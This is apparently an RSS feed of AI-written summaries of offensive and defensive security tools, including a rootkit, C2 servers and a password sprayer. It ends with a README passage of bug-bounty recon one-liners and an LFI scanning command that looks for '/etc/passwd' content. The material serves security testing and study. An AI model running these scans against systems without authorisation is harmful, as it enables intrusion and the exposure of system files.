&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Misconfig Mapper is a CLI tool developed by Intigriti designed to automate the detection and resolution of common security misconfigurations across various services and technologies. It leverages a flexible template-based system stored in &lt;code&gt;services.json&lt;/code&gt;, allowing users to easily add new services and perform extensive checks tailored to their specific environments. Key features include service enumeration, customizable detection templates, and the option to check only for service presence without performing misconfiguration assessments.&lt;/p&gt;</description></item><item><title>MISP</title><link>https://rainmana.github.io/hackyfeed/tools/misp-misp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/misp-misp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; MISP is an open-source threat intelligence sharing platform designed for incident analysts and cybersecurity professionals to collect, store, and share information regarding cyber threats and incidents. Its notable features include a comprehensive database for managing both technical and non-technical data, a flexible reporting system, and an automatic correlation engine that identifies relationships among threat indicators, enhancing collaboration within the security community. MISP supports integration with various security systems such as NIDS and SIEMs to facilitate efficient threat response and analysis.&lt;/p&gt;</description></item><item><title>MobileApp-Pentest-Cheatsheet</title><link>https://rainmana.github.io/hackyfeed/tools/tanprathan-mobileapp-pentest-cheatsheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tanprathan-mobileapp-pentest-cheatsheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Mobile Application Penetration Testing Cheat Sheet serves as a comprehensive resource for security professionals, offering a concise compilation of essential information and checklists for mobile app penetration testing, aligned with the OWASP Mobile Risk Top 10. It encompasses detailed methodologies for both Android and iOS applications, covering aspects such as static and dynamic analysis, network security testing, and techniques for bypassing common security measures. Notable features include a section on mobile security testing distributions and frameworks, providing users with tailored tools and environments to facilitate effective security assessments.&lt;/p&gt;</description></item><item><title>Modlishka</title><link>https://rainmana.github.io/hackyfeed/tools/drk1wi-modlishka/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/drk1wi-modlishka/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Modlishka is an open-source penetration testing tool that operates as a man-in-the-middle proxy, allowing seamless proxying of multi-domain HTTP and HTTPS traffic without requiring client certificate installation. Its primary use case is in security testing, particularly for ethical phishing assessments and 2FA bypass demonstrations, providing features such as pattern-based JavaScript payload injection, user credential harvesting, and extensive support for various 2FA schemes. Additionally, Modlishka&amp;rsquo;s modular and stateless design enhances scalability, while its cross-platform compatibility ensures usability across major operating systems.&lt;/p&gt;</description></item><item><title>monkey</title><link>https://rainmana.github.io/hackyfeed/tools/guardicore-monkey/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/guardicore-monkey/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Infection Monkey is an open-source adversary emulation platform designed to enhance security postures by simulating malware behavior within a network. It employs a dual-component architecture comprising an Agent, which mimics a network worm&amp;rsquo;s propagation techniques, and a centralized command and control server, Monkey Island, for monitoring and visualization. Notable features include various exploitation methods like Log4Shell and RDP, along with adaptive strategies to assess and improve security defenses against real threats.&lt;/p&gt;</description></item><item><title>monkey365</title><link>https://rainmana.github.io/hackyfeed/tools/silverhack-monkey365/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/silverhack-monkey365/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Monkey365 is an open-source PowerShell module designed for security configuration reviews of Microsoft 365, Azure, and Microsoft Entra ID environments. It enables users to identify potential security misconfigurations and provides actionable recommendations for compliance with best practices. Notable features include its user-friendly approach that minimizes the need for in-depth knowledge of APIs and complex dashboards while facilitating comprehensive scans for security gaps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://user-images.githubusercontent.com/5271640/181045413-1d17333c-0533-404a-91be-2070ccc6ee29.png" width="500" height="600" /&gt;
&lt;/p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="License" src="https://img.shields.io/github/license/silverhack/monkey365"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="Pester" src="https://github.com/silverhack/monkey365/actions/workflows/pester.yml/badge.svg"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="ScriptAnalyzer" src="https://github.com/silverhack/monkey365/actions/workflows/scriptanalyzer.yml/badge.svg"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365"&gt;&lt;img alt="Lines" src="https://img.shields.io/endpoint?url=https://ghloc.vercel.app/api/silverhack/monkey365/badge?filter=.ps1$,.psm1$&amp;style=flat&amp;logoColor=white&amp;label=Lines%20of%20Code"&gt;&lt;/a&gt;
 &lt;a href="https://twitter.com/tr1ana"&gt;&lt;img alt="Twitter" src="https://img.shields.io/twitter/follow/tr1ana?style=social"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/silverhack/monkey365/releases"&gt;&lt;img alt="GitHub Downloads" src="https://img.shields.io/github/downloads/silverhack/monkey365/total?style=flat&amp;logo=powershell&amp;label=GitHub%20Release%20Download"&gt;&lt;/a&gt;
 &lt;a href="https://www.powershellgallery.com/packages/monkey365"&gt;&lt;img alt="PowerShell Gallery" src="https://img.shields.io/powershellgallery/v/monkey365.svg?label=latest+version"&gt;&lt;/a&gt;
 &lt;a href="https://www.powershellgallery.com/packages/monkey365"&gt;&lt;img alt="PowerShell Gallery Downloads" src="https://img.shields.io/powershellgallery/dt/monkey365.svg?style=flat&amp;logo=powershell&amp;label=PSGallery%20Download"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>n0kovo_subdomains</title><link>https://rainmana.github.io/hackyfeed/tools/n0kovo-n0kovo_subdomains/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/n0kovo-n0kovo_subdomains/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; n0kovo_subdomains is a comprehensive subdomain enumeration wordlist containing 3,000,000 entries sourced from SSL certificate data across the entire IPv4 space. This tool is designed to enhance the efficacy of subdomain discovery activities for penetration testing and security assessments, utilizing a robust dataset that offers a balanced trade-off between size and search effectiveness. Users can leverage this highly efficient wordlist to improve the success rate of finding subdomains in various target domains.&lt;/p&gt;</description></item><item><title>netcat</title><link>https://rainmana.github.io/hackyfeed/tools/diegocr-netcat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/diegocr-netcat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Netcat for Windows is a TCP/IP utility designed for network diagnostics and exploration, functioning as a versatile &amp;ldquo;Swiss Army knife&amp;rdquo; for admins on the Windows platform. It supports both inbound and outbound connections over TCP or UDP, features built-in port scanning, DNS checks, and allows for custom local network configurations. Notably, this version excludes the potentially insecure -e switch to mitigate false positives from antivirus software, while also resolving issues encountered during telnet sessions.&lt;/p&gt;</description></item><item><title>Nettacker</title><link>https://rainmana.github.io/hackyfeed/tools/owasp-nettacker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/owasp-nettacker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OWASP Nettacker is an automated penetration testing and information-gathering framework designed for cybersecurity professionals to conduct reconnaissance, vulnerability assessments, and network security audits. Key features include a modular architecture for customizable task execution, support for multi-protocol and multithreaded scanning, comprehensive output formats, and a user-friendly interface for managing scans, all of which enhance its efficacy in identifying weaknesses across diverse systems and applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="owasp-nettacker"&gt;OWASP Nettacker&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/OWASP/Nettacker/actions/workflows/ci_cd.yml/badge.svg?branch=master"&gt;&lt;img src="https://github.com/OWASP/Nettacker/actions/workflows/ci_cd.yml/badge.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/OWASP/Nettacker/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/License-Apache%20v2-green.svg" alt="Apache License"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/iotscan"&gt;&lt;img src="https://img.shields.io/badge/Twitter-@iotscan-blue.svg" alt="Twitter"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/contributors/OWASP/Nettacker" alt="GitHub contributors"&gt;
&lt;a href="https://nettacker.readthedocs.io/en/latest/?badge=latest"&gt;&lt;img src="https://readthedocs.org/projects/nettacker/badge/?version=latest" alt="Documentation Status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/OWASP/Nettacker"&gt;&lt;img src="https://img.shields.io/github/repo-size/OWASP/Nettacker" alt="repo size "&gt;&lt;/a&gt;
&lt;a href="https://hub.docker.com/r/owasp/nettacker"&gt;&lt;img src="https://img.shields.io/docker/pulls/owasp/nettacker" alt="Docker Pulls"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>NeuroSploit</title><link>https://rainmana.github.io/hackyfeed/tools/joasasantos-neurosploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/joasasantos-neurosploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NeuroSploit v3 is an AI-powered penetration testing platform designed for autonomous security assessments, offering support for 100 vulnerability types within isolated Kali Linux containers. Key features include an autonomous agent for parallel testing, an exploit chain engine, anti-hallucination controls, real-time monitoring via a modern web interface, and multi-provider LLM integration for adaptive scanning strategies. The tool provides efficient scanning capabilities and detailed reporting, making it suitable for comprehensive security evaluations.&lt;/p&gt;</description></item><item><title>Nginx-Lua-Anti-DDoS</title><link>https://rainmana.github.io/hackyfeed/tools/c0nw0nk-nginx-lua-anti-ddos/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/c0nw0nk-nginx-lua-anti-ddos/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nginx-Lua-Anti-DDoS is a protective tool designed for Nginx web servers, leveraging Lua scripting to mitigate DDoS attacks through a JavaScript-based authentication puzzle inspired by Cloudflare&amp;rsquo;s &amp;ldquo;I&amp;rsquo;m Under Attack&amp;rdquo; mode. The tool features automatic detection and activation of protection mechanisms against various attack types, extensive IP and User-Agent filtering options, as well as capabilities to inspect and block malicious HTTP requests. With no limitation on attack size and built-in logging for monitoring, it offers customizable error responses and caching optimizations to enhance web server performance during attacks.&lt;/p&gt;</description></item><item><title>Nidhogg</title><link>https://rainmana.github.io/hackyfeed/tools/idov31-nidhogg/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/idov31-nidhogg/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nidhogg is a versatile kernel-level rootkit designed for Windows 10 and 11, enabling a wide array of operations directly from kernel space. Its primary use case is to facilitate stealthy and powerful control over system processes, threads, files, and registry items, featuring advanced capabilities such as process hiding, memory scanner bypassing, and credential dumping. Notable features include a built-in AMSI bypass, support for reflective loading, and a Nidhogg Object File (NOF) for custom kernel-mode code execution, enhancing its integration with command-and-control (C2) frameworks.&lt;/p&gt;</description></item><item><title>nishang</title><link>https://rainmana.github.io/hackyfeed/tools/samratashok-nishang/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samratashok-nishang/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nishang is a comprehensive PowerShell framework designed for offensive security, penetration testing, and red teaming, featuring a collection of scripts and payloads that assist in various stages of penetration testing. It allows users to execute scripts in memory to bypass antivirus detection and includes notable functionalities such as encoding commands, webshell capabilities, and Active Directory manipulation tools. The framework is structured for ease of use with PowerShell, offering detailed help for individual scripts and versatile execution methods.&lt;/p&gt;</description></item><item><title>nmap</title><link>https://rainmana.github.io/hackyfeed/tools/ullaakut-nmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ullaakut-nmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Ullaakut/nmap library offers Go developers a comprehensive interface to leverage the features of the Nmap network scanner within their applications, facilitating the creation of security audit tools. By utilizing the Go language&amp;rsquo;s capabilities, the library allows for robust network scans, service detection, and easy parsing of XML outputs produced by the Nmap binary. Notable features include support for various scan types and the ability to manage scan timeouts, enhancing both flexibility and performance in penetration testing scenarios.&lt;/p&gt;</description></item><item><title>nodepass</title><link>https://rainmana.github.io/hackyfeed/tools/nodepassproject-nodepass/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nodepassproject-nodepass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NodePass is an open-source network tunneling solution that provides enterprise-grade TCP/UDP tunneling with minimal configuration and high performance, designed for managing complex network scenarios. Key features include seamless protocol conversion, a connection pooling architecture for reduced latency, multi-level TLS security mechanisms, and real-time monitoring capabilities. The tool targets DevOps professionals and system administrators, facilitating effortless deployment and control in diverse networking conditions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;img src="https://nodepass.eu/assets/np-gopher.png" width="300"&gt;
&lt;p&gt;&lt;a href="https://github.com/avelino/awesome-go#networking"&gt;&lt;img src="https://awesome.re/mentioned-badge.svg" alt="Mentioned in Awesome Go"&gt;&lt;/a&gt;
&lt;a href="https://github.com/NodePassProject/nodepass/releases"&gt;&lt;img src="https://img.shields.io/github/v/release/NodePassProject/nodepass" alt="GitHub release"&gt;&lt;/a&gt;
&lt;a href="https://github.com/NodePassProject/nodepass/releases"&gt;&lt;img src="https://img.shields.io/github/downloads/NodePassProject/nodepass/total.svg" alt="GitHub downloads"&gt;&lt;/a&gt;
&lt;a href="https://goreportcard.com/report/github.com/NodePassProject/nodepass"&gt;&lt;img src="https://goreportcard.com/badge/github.com/NodePassProject/nodepass" alt="Go Report Card"&gt;&lt;/a&gt;
&lt;a href="https://opensource.org/licenses/BSD-3-Clause"&gt;&lt;img src="https://img.shields.io/badge/License-BSD_3--Clause-blue.svg" alt="License"&gt;&lt;/a&gt;
&lt;a href="https://pkg.go.dev/github.com/NodePassProject/nodepass"&gt;&lt;img src="https://pkg.go.dev/badge/github.com/NodePassProject/nodepass.svg" alt="Go Reference"&gt;&lt;/a&gt;
&lt;a href="https://deepwiki.com/NodePassProject/nodepass"&gt;&lt;img src="https://deepwiki.com/badge.svg" alt="Ask DeepWiki"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/last-commit/NodePassProject/nodepass" alt="GitHub last commit"&gt;&lt;/p&gt;</description></item><item><title>noseyparker</title><link>https://rainmana.github.io/hackyfeed/tools/praetorian-inc-noseyparker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/praetorian-inc-noseyparker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Nosey Parker is a command-line interface (CLI) tool designed for scanning textual data to identify secrets and sensitive information, essentially functioning as a specialized &lt;code&gt;grep&lt;/code&gt; for secret detection. Targeted primarily at offensive security operations, it offers features such as flexible scanning of various data sources, usage of 188 precision-focused regex rules, deduplication of matches to streamline review processes, and high-speed scanning capabilities, making it suitable for large-scale security engagements. Note that Nosey Parker has been officially retired and replaced by the tool Titus.&lt;/p&gt;</description></item><item><title>NoSQLMap</title><link>https://rainmana.github.io/hackyfeed/tools/codingo-nosqlmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/codingo-nosqlmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; NoSQLMap is a Python tool designed for auditing and automating injection attacks on NoSQL databases, primarily targeting MongoDB and CouchDB, while also preparing for support of others like Redis and Cassandra. It helps identify and exploit default configuration vulnerabilities to disclose or replicate database data through a user-friendly menu-based interface. Key features include options for NoSQL DB access attacks, web application attacks, and scanning for anonymous MongoDB access.&lt;/p&gt;</description></item><item><title>o365recon</title><link>https://rainmana.github.io/hackyfeed/tools/nyxgeek-o365recon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nyxgeek-o365recon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; o365recon is a PowerShell script designed for retrieving information from Office 365 and Azure AD using valid credentials. Its primary use case is to facilitate information gathering for security assessments, with a notable feature allowing optional Azure querying through a simple command-line interface. The tool requires the installation of MSOnline and AzureAD modules and includes support for multi-factor authentication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="o365recon"&gt;o365recon&lt;/h1&gt;
&lt;p&gt;script to retrieve information via O365 and AzureAD with a valid cred&lt;/p&gt;</description></item><item><title>o365spray</title><link>https://rainmana.github.io/hackyfeed/tools/0xzdh-o365spray/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xzdh-o365spray/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; o365spray is a specialized tool for username enumeration and password spraying targeting Microsoft Office 365 (O365) environments. It allows users to validate domains, enumerate usernames, and conduct password spraying attacks, featuring configurable options for lockout policies and enumeration modules. The tool emphasizes caution by automatically managing lockout timers during operations to mitigate potential account lockouts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="o365spray"&gt;o365spray&lt;/h1&gt;
&lt;p&gt;o365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365). This tool reimplements a collection of enumeration and spray techniques researched and identified by those mentioned in &lt;a href="#Acknowledgments"&gt;Acknowledgments&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>obliteration</title><link>https://rainmana.github.io/hackyfeed/tools/obhq-obliteration/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/obhq-obliteration/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Obliteration is an open-source PlayStation 4 kernel reimplementation in Rust, designed to enable the execution of dumped PlayStation 4 system software on various operating systems, including Windows, Linux, and macOS. Notable features include cross-platform support with native binaries, near-native performance leveraging hypervisor technologies, and a kernel architecture aimed to closely resemble the original PlayStation 4 kernel for enhanced compatibility. Currently, the project is in early development and does not yet support game execution.&lt;/p&gt;</description></item><item><title>Octopus</title><link>https://rainmana.github.io/hackyfeed/tools/mhaskar-octopus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mhaskar-octopus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Octopus is an open-source, pre-operation command-and-control (C2) server developed in Python, designed for red team operations to facilitate initial attacks and information gathering before launching full engagements. It features secure communications through AES-256 encryption, remote command execution, file transfers, and a unique Endpoint Situational Awareness (ESA) capability that allows users to assess target environments effectively. The tool supports multiple Windows versions and enables stealthy operations, making it less detectable by conventional security measures.&lt;/p&gt;</description></item><item><title>OffSec-Reporting</title><link>https://rainmana.github.io/hackyfeed/tools/syslifters-offsec-reporting/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/syslifters-offsec-reporting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OffSec Reporting is a customizable platform designed for security professionals to efficiently create penetration test reports tailored for Offensive Security certifications. Built on SysReptor, it enables users to write reports in Markdown, render them as PDFs, and supports various OffSec certifications including OSCP, OSEP, and OSWP. Notable features include free accessibility, rapid report generation, and a focus on facilitating the testing process without the burden of formatting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="offsec-reporting-using-sysreptor"&gt;OffSec Reporting using SysReptor&lt;/h1&gt;
&lt;h1 align="center"&gt;
 &lt;a href="https://docs.sysreptor.com/"&gt;&lt;img src="https://rainmana.github.io/hackyfeed/assets/Banner-SysReptor-OffSec.svg" width="100%" alt="SysReptor"&gt;&lt;/a&gt;
&lt;/h1&gt;
&lt;p align="center"&gt;
&lt;a href="https://github.com/syslifters/sysreptor/"&gt;
 &lt;img src="https://img.shields.io/github/stars/Syslifters/sysreptor?color=yellow&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://github.com/syslifters/sysreptor/releases/latest"&gt;
 &lt;img src="https://img.shields.io/github/v/release/syslifters/sysreptor?color=green&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://github.com/syslifters/sysreptor/releases/latest"&gt;
 &lt;img src="https://img.shields.io/github/release-date/syslifters/sysreptor?color=blue&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://github.com/syslifters/sysreptor/releases/latest"&gt;
 &lt;img src="https://img.shields.io/github/repo-size/syslifters/sysreptor?color=red&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://www.linkedin.com/company/syslifters/"&gt;
 &lt;img src="https://img.shields.io/badge/-Linkedin-blue?style=flat-square&amp;logo=linkedin"&gt;
&lt;/a&gt;
&lt;a href="https://twitter.com/intent/user?screen_name=sysreptor"&gt;
 &lt;img src="https://img.shields.io/twitter/follow/sysreptor?style=social"&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>oletools</title><link>https://rainmana.github.io/hackyfeed/tools/decalage2-oletools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/decalage2-oletools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; oletools is a Python package designed for analyzing Microsoft OLE2 files, including older Microsoft Office documents, MSI files, and Outlook messages, primarily for malware detection, forensics, and debugging. Key features include the ability to detect, extract, and analyze VBA macros, OLE objects, Excel 4 macros (XLM), DDE links, and capabilities for analyzing RTF and OpenXML files. The tool is built on the olefile parser, enhancing its functionality with various detection mechanisms and logging options.&lt;/p&gt;</description></item><item><title>One-Liners</title><link>https://rainmana.github.io/hackyfeed/tools/0xpugal-one-liners/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xpugal-one-liners/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; One-Liners is a comprehensive toolkit designed for bug bounty hunters, facilitating rapid reconnaissance and vulnerability scanning through efficient one-liner commands. It primarily focuses on subdomain enumeration, open redirect testing, LFI, SSRF, and XSS detection using various profiling tools like &lt;code&gt;subfinder&lt;/code&gt;, &lt;code&gt;dnsx&lt;/code&gt;, and &lt;code&gt;nuclei&lt;/code&gt;. Notable features include integration with multiple API sources for subdomain discovery and streamlined workflows for testing web application vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="one-liners-for-bug-bounty"&gt;One-Liners for bug bounty&lt;/h1&gt;
&lt;h6 id="thanks-to-all-who-create-these-awesome-one-liners"&gt;Thanks to all who create these Awesome One Liners❤️&lt;/h6&gt;
&lt;hr&gt;
&lt;h2 id="image"&gt;&lt;img src="https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png" alt="image"&gt;&lt;/h2&gt;
&lt;h2 id="one-line-recon-using-pd-tools"&gt;One Line recon using pd tools&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt
&lt;/code&gt;&lt;/pre&gt;&lt;h1 id="subdomain-enumeration"&gt;Subdomain Enumeration&lt;/h1&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d &amp;#39; &amp;#39; -f1 | grep --color &amp;#39;api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn&amp;#39;

## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d&amp;#39;,&amp;#39; -f2 | sort -u 

## from Riddler.io

curl -s &amp;#34;https://riddler.io/search/exportcsv?q=pld:target.com&amp;#34; | grep -Po &amp;#34;(([\w.-]*)\.([\w]*)\.([A-z]))\w+&amp;#34; | sort -u 

## from RedHunt Labs Recon API
curl --request GET --url &amp;#39;https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=&amp;lt;target.com&amp;gt;&amp;amp;page_size=1000&amp;#39; --header &amp;#39;X-BLOBR-KEY: API_KEY&amp;#39; | jq &amp;#39;.subdomains[]&amp;#39; -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s &amp;#34;https://api.certspotter.com/v1/issuances?domain=target.com&amp;amp;include_subdomains=true&amp;amp;expand=dns_names&amp;#34; | jq .[].dns_names | grep -Po &amp;#34;(([\w.-]*)\.([\w]*)\.([A-z]))\w+&amp;#34; | sort -u

## from Archive
curl -s &amp;#34;http://web.archive.org/cdx/search/cdx?url=*.target.com/*&amp;amp;output=text&amp;amp;fl=original&amp;amp;collapse=urlkey&amp;#34; | sed -e &amp;#39;s_https*://__&amp;#39; -e &amp;#34;s/\/.*//&amp;#34; | sort -u

## from JLDC
curl -s &amp;#34;https://jldc.me/anubis/subdomains/target.com&amp;#34; | grep -Po &amp;#34;((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+&amp;#34; | sort -u

## from crt.sh
curl -s &amp;#34;https://crt.sh/?q=%25.target.com&amp;amp;output=json&amp;#34; | jq -r &amp;#39;.[].name_value&amp;#39; | sed &amp;#39;s/\*\.//g&amp;#39; | sort -u

## from ThreatMiner
curl -s &amp;#34;https://api.threatminer.org/v2/domain.php?q=target.com&amp;amp;rt=5&amp;#34; | jq -r &amp;#39;.results[]&amp;#39; |grep -o &amp;#34;\w.*target.com&amp;#34; | sort -u

## from Anubis
curl -s &amp;#34;https://jldc.me/anubis/subdomains/target.com&amp;#34; | jq -r &amp;#39;.&amp;#39; | grep -o &amp;#34;\w.*target.com&amp;#34;

## from ThreatCrowd
curl -s &amp;#34;https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com&amp;#34; | jq -r &amp;#39;.subdomains&amp;#39; | grep -o &amp;#34;\w.*target.com&amp;#34;

## from HackerTarget
curl -s &amp;#34;https://api.hackertarget.com/hostsearch/?q=target.com&amp;#34;

## from AlienVault
curl -s &amp;#34;https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&amp;amp;page=1&amp;#34; | grep -o &amp;#39;&amp;#34;hostname&amp;#34;: *&amp;#34;[^&amp;#34;]*&amp;#39; | sed &amp;#39;s/&amp;#34;hostname&amp;#34;: &amp;#34;//&amp;#39; | sort -u

## from Censys
censys subdomains target.com

## from subdomain center
curl &amp;#34;https://api.subdomain.center/?domain=target.com&amp;#34; | jq -r &amp;#39;.[]&amp;#39; | sort -u
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="lfi"&gt;LFI:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep &amp;#34;=&amp;#34; | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr &amp;#34;root:[x*]:0:0:&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="open-redirect"&gt;Open Redirect:&lt;/h2&gt;
